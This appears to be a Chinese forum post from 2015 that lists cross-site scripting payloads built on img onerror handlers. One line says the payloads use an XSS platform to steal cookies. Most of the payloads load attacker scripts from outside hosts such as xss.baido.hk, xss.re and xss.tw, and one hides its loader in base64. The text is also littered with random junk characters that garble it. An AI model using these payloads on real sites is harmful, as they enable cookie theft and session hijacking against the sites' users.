<img src='non-exist.jpg'onerror="alert('xss')">
+ o/ b; E) a) x9 D5 W' s<img src=# onerror=alert(123)> a. ~% j, f0 R2 V6 ]
<img src=# onerror=alert(document.cookie)>
8 V* z6 H' ?( W, Z4 S0 ?) _$ ]/ b下面是利用平台钓cookie的1 w' ~: ~9 C7 N4 a% h
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
. D0 j- e3 w7 X. \( k% s
- O% u% ]4 ]: Z: b' K3 o# o2 N9 b6 e
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>" f) [2 m, ~/ H2 V1 K* ?
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>4 m0 M- U# r7 E8 k- S
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>0 j) U1 G. f J9 u" J. D/ X
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
5 ?5 m' ?# v$ Y+ Y5 B/ `<img src="#">
) x; D6 D4 x d( j<img src="#">
$ X7 k' L$ y. S- T' E: r" f0 y# d<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>2 I+ Z6 K B% @8 V: W
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
" j8 A7 r- R" @<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
2 ~. A) j6 y, K- S. V<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
: P: o7 J1 L7 L Y<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘> R* h0 ^ a+ a" V4 R8 f, E
<img src=x width="0" height="0"></img>% M' a# J$ B9 F" |' C2 o. e* F
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>, C5 Q, s* \" r" x) {7 l
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
7 A) d4 T% m# ]0 N) g |
发表于 2015-10-18 14:33:54
收藏
支持
反对